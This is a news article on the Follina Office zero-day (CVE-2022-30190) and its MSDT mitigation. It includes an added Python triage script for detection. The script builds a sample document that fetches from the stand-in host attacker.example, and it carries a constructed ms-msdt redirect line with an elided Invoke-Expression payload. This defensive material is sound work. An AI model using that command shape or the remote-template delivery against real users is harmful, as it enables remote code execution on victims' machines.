Follina, the new Zero Day vulnerability that affects Office

Cybercriminals are exploiting a zero-day vulnerability, dubbed Follina, that allows them to remotely execute code through the Microsoft Office suite.

The vulnerability, CVE-2022-30190, which experts call Follina, has been found in the URL protocol handler of the Microsoft Support Diagnostic Tool (MSDT) and affects the Microsoft Office suite.

It is a zero-day vulnerability that can be triggered even when macros are disabled.

It was discovered by the nao_sec research team after they examined a Word document uploaded to VirusTotal from an IP address located in Belarus. However, older malicious samples dated last April have also been found, which implies that the vulnerability may have been exploited for more than a month.

This initially led to the belief that it might be a vulnerability in Word, since the original exploit arrived in that document format. However, researcher Kevin Beaumont’s analysis determined that the exploit took advantage of Word’s remote template feature to retrieve an HTML file from a remote server.

Once that file was retrieved, it used the ms-msdt URL scheme to launch MSDT and execute malicious code, including a PowerShell script.

Through this chain, attackers execute PowerShell commands via the MSDT tool in a way that bypassed Windows Defender detection; a series of instructions is grouped into a single command so that the task runs automatically.
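The two stages described above leave traces an analyst can check for without opening the document: an external relationship in the .docx package that points at an http(s) server (Word resolves these on open, so macros are irrelevant), and an HTML stage that hands an ms-msdt: URL to the operating system. The following triage helper is an added example and is not code from the original article, nao_sec or Kevin Beaumont; the sample document and HTML it scans are constructed for the demonstration (the real payload is not reproduced), the hostname attacker.example is a placeholder, and the indicator list is illustrative rather than exhaustive. It generalises slightly beyond the text by flagging any external relationship in any .rels part, which covers both the remote-template route and the external OLE link seen in the public sample.

```python
"""Triage helper for the Follina (CVE-2022-30190) delivery chain.

Added example, not code from the original article. Checks the two stages the
article describes: an Office document that pulls content from a remote server
through an external relationship, and an HTML page that invokes the ms-msdt:
URL scheme. All sample inputs are constructed here for the demonstration.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OOXML_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"

# ms-msdt: is the scheme that routes the URL to the MSDT handler.
MSDT_SCHEME = re.compile(r"ms-msdt:", re.IGNORECASE)
# Strings seen in the public Follina HTML stage (assumption: illustrative list).
MSDT_INDICATORS = ("PCWDiagnostic", "IT_BrowseForFile", "Invoke-Expression", "/skip force")


def find_external_relationships(docx_bytes: bytes) -> List[Dict[str, str]]:
    """Return every relationship in any *.rels part that targets an http(s) URL.

    Word's remote-template feature and external OLE links both show up as
    TargetMode="External" with a remote Target, and Word fetches them on open.
    """
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode", "").lower() != "external":
                    continue
                target = rel.get("Target", "")
                if target.lower().startswith(("http://", "https://")):
                    hits.append({
                        "part": name,
                        "id": rel.get("Id", ""),
                        "type": rel.get("Type", "").rsplit("/", 1)[-1],
                        # the public sample appended "!" to the OLE link target
                        "target": target.rstrip("!"),
                    })
    return hits


def scan_html_for_msdt(html: str) -> Dict[str, object]:
    """Flag an HTML stage that would hand an ms-msdt: URL to Windows."""
    scheme = bool(MSDT_SCHEME.search(html))
    lowered = html.lower()
    found = [ind for ind in MSDT_INDICATORS if ind.lower() in lowered]
    return {"ms_msdt_scheme": scheme, "indicators": found, "suspicious": scheme}


def build_sample_docx(remote_target: Optional[str]) -> bytes:
    """Construct a minimal .docx; with remote_target set it carries an external OLE link."""
    external = ""
    if remote_target:
        external = (f'  <Relationship Id="rId996" Type="{OOXML_REL}/oleObject" '
                    f'Target="{remote_target}!" TargetMode="External"/>\n')
    rels = (f'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
            f'<Relationships xmlns="{REL_NS}">\n'
            f'  <Relationship Id="rId1" Type="{OOXML_REL}/styles" Target="styles.xml"/>\n'
            f'{external}</Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


# Constructed HTML stage: same shape as the public sample, payload replaced by "...".
SAMPLE_HTML = """<!doctype html><html><body><script>
window.location.href = 'ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_BrowseForFile=$(Invoke-Expression(...))"';
</script></body></html>"""


if __name__ == "__main__":
    doc = build_sample_docx("http://attacker.example/stage2.html")  # constructed
    for hit in find_external_relationships(doc):
        print("external relationship:", hit)
    print("html scan:", scan_html_for_msdt(SAMPLE_HTML))
```

On a real submission you would feed the bytes of the suspicious .docx to find_external_relationships, then fetch the flagged target from an isolated analysis host and pass the body to scan_html_for_msdt; a hit on the scheme alone is enough to treat the document as malicious.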

As Eusebio Nieva, technical director of Check Point Software for Spain and Portugal, points out, “the problem is in the MSDT, which is software that helps solve problems, but to which you can add a link within Office documents, especially in Word. Therefore, the attack is indeed not a vulnerability of Word but of this product.”

In this sense, the executive stresses that the product can be reached simply by referencing it with a URL, which is what makes the flaw so widely exploitable and so serious.

Office as an attack surface

As a result, any document that a user downloads from the Internet could be used to attack them through this vulnerability. And it need not be a Word document: any other application in the Office package could serve as the carrier.


Embedding that MSDT link in a document runs a PowerShell command or downloads further components. “It is what is called the first infection vector, that is, it uses this vulnerability so that, for the first time, you download a small piece of malicious software that, in turn, does everything else, such as downloading the rest, starting to infect, etc.”

The tests carried out indicate that the exploit works on Office 2013, 2016, 2019 and 2021, as well as Office ProPlus and Office 365.

Beaumont also points to a greater severity of the issue: since the vulnerability lies in MSDT rather than in Office itself, it can be triggered from other Windows applications as well, such as Outlook.

As Nieva points out, “the problem we have is that this first infection vector can be used by Emotet or by any kind of ransomware to infect. We can detect who is infected, but the infection vectors can be multiple, and this might be one of them.”

In this sense, the Check Point Software executive notes that a worrying point is that the vulnerability is easy to exploit and the attack surface is everyone who has Office.

Pending a fix, Microsoft advises disabling the MSDT URL protocol on the system, which prevents other applications from automatically invoking the MSDT troubleshooter.

To do this, run the command prompt as an administrator and first back up the registry key with the command “reg export HKEY_CLASSES_ROOT\ms-msdt filename”. Once that is done, run “reg delete HKEY_CLASSES_ROOT\ms-msdt /f”. The exported file allows the key to be restored later with “reg import filename” once a patch is installed.

However, Microsoft will still have to act and fix the vulnerability in MSDT itself, something that is expected as soon as possible to limit the spread of the damage.
